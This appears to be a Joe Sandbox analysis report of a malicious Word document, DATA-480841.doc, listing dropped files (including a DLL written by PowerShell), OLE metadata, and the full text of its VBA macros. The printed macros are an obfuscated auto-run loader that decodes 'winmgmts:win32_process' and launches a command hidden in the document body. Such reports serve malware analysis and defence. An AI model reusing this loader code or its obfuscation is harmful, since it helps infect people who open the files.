                                            Joe Sandbox View / Context

                                            IPs


                                            Domains


                                            ASN


                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Preview
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46
                                            Entropy (8bit):1.0424600748477153
                                            Encrypted:false
                                            SSDEEP:3:/lbWwWl:sZ
                                            MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                            SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                            SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                            SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                            Malicious:false
                                            Preview: ........................................user.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DATA-480841.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:44:40 2021, length=169984, window=hide
                                            Category:dropped
                                            Size (bytes):2038
                                            Entropy (8bit):4.495422520712642
                                            Encrypted:false
                                            SSDEEP:24:8rk/XTm6GreV2UNeM0Dv3qcdM7dD2rk/XTm6GreV2UNeM0Dv3qcdM7dV:8rk/XTFGqMUN1cQh2rk/XTFGqMUN1cQ/
                                            MD5:0CDFA0D89B4174F43B7C98022E2F67A9
                                            SHA1:008543A332890FB46A197EA8B2A2BF9972D66097
                                            SHA-256:20B80A3021EC817285D5BF337B8F4A53C94B7E53F690B000FB63C41733F9F327
                                            SHA-512:7287791BE8D03043B880AA542ADF149D8CB4A773F384164D2C60DD64BC2D621B7ACA4641E63A36D9E364C62CA6551815939BFD4DFD44B6936E98CA368B2EDC32
                                            Malicious:false
                                            Preview: L..................F.... ...+....{..+....{..r.':K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....&R.. .DATA-4~1.DOC..L.......Q.y.Q.y*...8.....................D.A.T.A.-.4.8.0.8.4.1...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\DATA-480841.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.A.T.A.-.4.8.0.8.4.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):71
                                            Entropy (8bit):4.205347563368731
                                            Encrypted:false
                                            SSDEEP:3:M1yxkI0U5m0UmX1yxkI0Uv:Mwr0Gm0+r02
                                            MD5:393D2B811D2C21BEC5044DA35CB2B892
                                            SHA1:7034476F98514692497F81BA49080B25E16ADA4E
                                            SHA-256:A39A8F9194A9550DBB104AEF26FEAAA393BF5556B5858FA6F2BF94C70ADE2491
                                            SHA-512:A19B46013D6958EE4B24D1B5C37466A0EBE85B0187003970900753A42076124A38B4DDC880560DBEB9E80976887A4AFCD9E0A889E504575BBB5E223C688F3858
                                            Malicious:false
                                            Preview: [doc]..DATA-480841.LNK=0..DATA-480841.LNK=0..[doc]..DATA-480841.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IA60F366WYHGBU3KMBI7.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5864454036976654
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqbqvsqvJCwoSz8hQCsMqbqvsEHyqvJCwor8zv1YkHVf8OzlUVIIu:cy+oSz8yWHnor8zvpf8OjIu
                                            MD5:381B309891E02EEBC8A0AD30FA4A8C2E
                                            SHA1:1D4C2C8EFB538F3FDC7696EE142B50199A1A6B45
                                            SHA-256:BBFB5B76E4CC383551743BC5C9F1DCE3EF0978D7CF3033932C5E2CE7EAB97BDF
                                            SHA-512:CD7A09AFC5713E01CAC59A5E5E52B7B42E8EBC23818C6D97363DB2FDC73C06B3889080BE8D67D15B228D77FBADA9B82B4078F200707A4E079B983AB432821F0E
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Desktop\~$TA-480841.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):200625
                                            Entropy (8bit):7.475413668537472
                                            Encrypted:false
                                            SSDEEP:3072:CtEwbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:CtEsl9FTaBYF0nVp2MJHybR8dS9
                                            MD5:D3EF5D9C09B25890DACFCE5D440EA042
                                            SHA1:F88C6C45E5E5A8A3573D20EDF7C474B29778002A
                                            SHA-256:52CDD409E97D303319405D775622CC2BF34BBF76E0EF3C018F6D13EA395D7766
                                            SHA-512:FAC932431D0A1457377DE14A713E6DEF91382A6764355D6575763941BF75E23267AF5BECDEBE85726842A83B5B1D601C39627C8661A79AF45689A861E33332D2
                                            Malicious:false
                                            Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: lime payment B2B responsive Practical solid state copy compelling, Author: Clment Fontaine, Template: Normal.dotm, Last Saved By: La Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
                                            Entropy (8bit):6.709357793973764
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:DATA-480841.doc
                                            File size:169330
                                            MD5:2ed8a95357ee4e2d433bcbeb2ef43fc9
                                            SHA1:06838eec498718aace03e6ef28d3f0292a631f8a
                                            SHA256:485c5e8d7bc0f0fc416a7d6cfa8780ebc42c03ff41568af70c358ee8b8afa02c
                                            SHA512:4a02c2878c9787ed268744ecbce51cbf082e5f4d9403867e63ccba10c04c91558d25a22608fad763748d356c29fbe1b3ef3ea28ae38ab534def6380cd5434b9b
                                            SSDEEP:3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gs:4D9ufsfgIf0pLs

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "DATA-480841.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:lime payment B2B responsive Practical solid state copy compelling
                                            Author:Clment Fontaine
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:La Menard
                                            Revision Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-05 10:15:00
                                            Last Saved Time:2021-01-05 10:15:00
                                            Number of Pages:1
                                            Number of Words:2640
                                            Number of Characters:15049
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:125
                                            Number of Paragraphs:35
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117
                                            General
                                            Stream Path:Macros/VBA/A5gd21klfqu9c6rs
                                            VBA File Name:A5gd21klfqu9c6rs
                                            Stream Size:1117

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_Customizable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_TemplateDerived
                                            VBA Code
                                            Attribute VB_Name = "A5gd21klfqu9c6rs"
                                            Attribute VB_Base = "1Normal.ThisDocument"
                                            Attribute VB_GlobalNameSpace = False
                                            Attribute VB_Creatable = False
                                            Attribute VB_PredeclaredId = True
                                            Attribute VB_Exposed = True
                                            Attribute VB_TemplateDerived = True
                                            Attribute VB_Customizable = True
                                            Private Sub Document_open()
                                            G8xesq0b8jlsfrsp
                                            End Sub
                                            VBA File Name: Owppnp8hah4xo788, Stream Size: 17915
                                            General
                                            Stream Path:Macros/VBA/Owppnp8hah4xo788
                                            VBA File Name:Owppnp8hah4xo788
                                            Stream Size:17915

                                            VBA Code Keywords

                                            VBA Code
                                            Attribute VB_Name = "Owppnp8hah4xo788"
                                            Function G8xesq0b8jlsfrsp()
                                            On Error Resume Next
                                            Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
                                            sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
                                               GoTo SblcDCC
                                            Dim pULquU As Object
                                            Set ibIiBF = diCXTi
                                            Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim SblcDCC As Object
                                            Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                                            SblcDCC.WriteLine "VrVKCjefsIJ"
                                            SblcDCC.WriteLine "sxbwAfRtWJI"
                                            SblcDCC.WriteLine "WLXLJnjItPGPZJ"
                                            Set jbUmDI = NZiApKAp
                                            SblcDCC.Close
                                            Set pULquU = Nothing
                                            Set MznOjBB = vrYYHIDxI
                                            Set SblcDCC = Nothing
                                            SblcDCC:
                                            t3s = "]anw[3" + "p]anw[3"
                                            K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                               GoTo fNhiCVgGS
                                            Dim RyDBDK As Object
                                            Set WTbkNqFa = gzTFLxb
                                            Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim fNhiCVgGS As Object
                                            Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                                            fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
                                            fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
                                            fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
                                            Set OlapGi = PjNhJNA
                                            fNhiCVgGS.Close
                                            Set RyDBDK = Nothing
                                            Set yabVbA = oAaNlB
                                            Set fNhiCVgGS = Nothing
                                            fNhiCVgGS:
                                            Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
                                               GoTo HCvCmAcHC
                                            Dim iFTmFHFH As Object
                                            Set UDSpFHqFJ = sySRJ
                                            Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim HCvCmAcHC As Object
                                            Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                                            HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
                                            HCvCmAcHC.WriteLine "lwWhZGEasjsS"
                                            HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
                                            Set MmSDYCkJR = UwyYSBsBN
                                            HCvCmAcHC.Close
                                            Set iFTmFHFH = Nothing
                                            Set EISYDDB = tpOgXmm
                                            Set HCvCmAcHC = Nothing
                                            HCvCmAcHC:
                                            Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
                                               GoTo gEcrV
                                            Dim RqlOZAHRJ As Object
                                            Set jsYAGBJAF = MHYlQAD
                                            Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim gEcrV As Object
                                            Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                            gEcrV.WriteLine "dXFPCSYtSNB"
                                            gEcrV.WriteLine "KqVyuQQfwTWh"
                                            gEcrV.WriteLine "qDaYIDDSZQMTaO"
                                            Set IePCGy = GznGGHyG
                                            gEcrV.Close
                                            Set RqlOZAHRJ = Nothing
                                            Set cwsTFPCH = bbsIZ
                                            Set gEcrV = Nothing
                                            gEcrV:
                                            Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
                                               GoTo ZMdrVHGz
                                            Dim xsruLB As Object
                                            Set fiyQuiRBI = swNGWdd
                                            Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim ZMdrVHGz As Object
                                            Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                            ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
                                            ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
                                            ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
                                            Set xPBGH = rJEkbLH
                                            ZMdrVHGz.Close
                                            Set xsruLB = Nothing
                                            Set dLRiF = vEBqHrDnD
                                            Set ZMdrVHGz = Nothing
                                            ZMdrVHGz:
                                            K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
                                               GoTo fDZVKAAc
                                            Dim tzErBRFe As Object
                                            Set SeHafBC = tWcKo
                                            Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim fDZVKAAc As Object
                                            Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                            fDZVKAAc.WriteLine "hKlajOujwgDFAA"
                                            fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
                                            fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
                                            Set CHVmaVC = LzxxRHG
                                            fDZVKAAc.Close
                                            Set tzErBRFe = Nothing
                                            Set WlBWDXGD = EKezHIC
                                            Set fDZVKAAc = Nothing
                                            fDZVKAAc:
                                            Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
                                               GoTo rYbgBh
                                            Dim hZCth As Object
                                            Set LQqlBAHD = DpYbmDA
                                            Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim rYbgBh As Object
                                            Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                            rYbgBh.WriteLine "CVbRCAAhkhmcDG"
                                            rYbgBh.WriteLine "XrrAwQZPjqB"
                                            rYbgBh.WriteLine "fxSJajCGlWUEBW"
                                            Set phIwFD = hDJDJ
                                            rYbgBh.Close
                                            Set hZCth = Nothing
                                            Set PnolTIbAB = dXiwA
                                            Set rYbgBh = Nothing
                                            rYbgBh:
                                            Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
                                               GoTo GfRPP
                                            Dim xLQtMd As Object
                                            Set uRnkDGJ = hFSyAfFrF
                                            Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim GfRPP As Object
                                            Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                            GfRPP.WriteLine "qiXBsMBsLJGbX"
                                            GfRPP.WriteLine "mehEFPFHcklgJDDx"
                                            GfRPP.WriteLine "BndJDkuVYF"
                                            Set xiFRA = hXxQDACJA
                                            GfRPP.Close
                                            Set xLQtMd = Nothing
                                            Set jENfzNH = xkQqDXCcD
                                            Set GfRPP = Nothing
                                            GfRPP:
                                            Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
                                               GoTo sCOIGDtD
                                            Dim eepvDEaE As Object
                                            Set jzqBlGW = lBenBDA
                                            Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim sCOIGDtD As Object
                                            Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                            sCOIGDtD.WriteLine "JTSPCDjykfL"
                                            sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
                                            sCOIGDtD.WriteLine "anBQXljzGenE"
                                            Set tAmQHxlD = UavHTIBHo
                                            sCOIGDtD.Close
                                            Set eepvDEaE = Nothing
                                            Set gphNDVZp = IcAHwPH
                                            Set sCOIGDtD = Nothing
                                            sCOIGDtD:
                                               GoTo fmwdEMADQ
                                            Dim DkLoDL As Object
                                            Set plqkuDI = BNmrm
                                            Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim fmwdEMADQ As Object
                                            Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                                            fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
                                            fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
                                            fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
                                            Set jPJENIo = FLtYjKHC
                                            fmwdEMADQ.Close
                                            Set DkLoDL = Nothing
                                            Set ANzGyzCD = qAUhkIMz
                                            Set fmwdEMADQ = Nothing
                                            fmwdEMADQ:
                                            Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
                                               GoTo pkixJADG
                                            Dim DhnHIY As Object
                                            Set oQgLUI = zZuzBZGD
                                            Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim pkixJADG As Object
                                            Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                                            pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
                                            pkixJADG.WriteLine "wypNISsWSXthFJCq"
                                            pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
                                            Set ecGmY = OIbfvEEFF
                                            pkixJADG.Close
                                            Set DhnHIY = Nothing
                                            Set EKmLA = eLmLDU
                                            Set pkixJADG = Nothing
                                            pkixJADG:
                                               GoTo KmGOADt
                                            Dim CFdSBD As Object
                                            Set nhLeJMLfI = FYVZFEH
                                            Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim KmGOADt As Object
                                            Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                            KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
                                            KmGOADt.WriteLine "eXpjHFapHaPdRJu"
                                            KmGOADt.WriteLine "eXObOTlBAITEOIo"
                                            Set STzBjwICv = hoyzuBGCP
                                            KmGOADt.Close
                                            Set CFdSBD = Nothing
                                            Set ORLICIl = lADFBaJ
                                            Set KmGOADt = Nothing
                                            KmGOADt:
                                            End Function
                                            Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
                                            On Error Resume Next
                                               GoTo PbhYVsA
                                            Dim PcHRGIADo As Object
                                            Set TXmxvp = SQQWY
                                            Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim PbhYVsA As Object
                                            Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                            PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
                                            PbhYVsA.WriteLine "OyFBLhlWUnD"
                                            PbhYVsA.WriteLine "TBKmUCEXTUIGu"
                                            Set qHKYGHlFA = ddanFDWJf
                                            PbhYVsA.Close
                                            Set PcHRGIADo = Nothing
                                            Set sPkIwu = RhztCF
                                            Set PbhYVsA = Nothing
                                            PbhYVsA:
                                            Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
                                               GoTo NuebA
                                            Dim sTzDC As Object
                                            Set GIAKA = kwzjKvZHe
                                            Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim NuebA As Object
                                            Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                            NuebA.WriteLine "NeiIGCNWgICn"
                                            NuebA.WriteLine "EgxfIDVQbJotWhj"
                                            NuebA.WriteLine "UjBKOEDRIbiWFB"
                                            Set idbaDIr = inIcjJtaF
                                            NuebA.Close
                                            Set sTzDC = Nothing
                                            Set KXwaABT = zBSWCKmJv
                                            Set NuebA = Nothing
                                            NuebA:
                                            Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
                                               GoTo gxBPJB
                                            Dim zxgLHJSFW As Object
                                            Set quDoH = KXTliE
                                            Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim gxBPJB As Object
                                            Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                            gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
                                            gxBPJB.WriteLine "WNFUDvHgghFdup"
                                            gxBPJB.WriteLine "eeVVJBMGlcfXMB"
                                            Set nleaHR = YZllAeRe
                                            gxBPJB.Close
                                            Set zxgLHJSFW = Nothing
                                            Set mgTNFCq = hjZwD
                                            Set gxBPJB = Nothing
                                            gxBPJB:
                                            Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
                                               GoTo mgrwfmN
                                            Dim RjiQHRA As Object
                                            Set EhCMG = FUyIHBDFz
                                            Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim mgrwfmN As Object
                                            Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                            mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
                                            mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
                                            mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
                                            Set MNihxICY = AiRdGDAJ
                                            mgrwfmN.Close
